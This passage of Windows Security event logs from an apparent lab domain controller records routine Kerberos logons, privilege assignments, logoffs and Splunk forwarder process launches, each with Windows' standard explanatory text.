Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51874
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:50:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264128
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BC40D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264132
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x3c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264131
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1064
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264133
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264134
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264135
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264137
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264136
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264139
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7BF282
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51879
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264138
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF282
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264141
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7BF8F8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264140
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF8F8
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 02:51:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264142
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF282
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:51:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264145
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C05A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:51:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264144
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C05A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62338
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:51:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264143
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C05A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264147
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264146
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264148
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264149
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264150
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264152
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264151
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
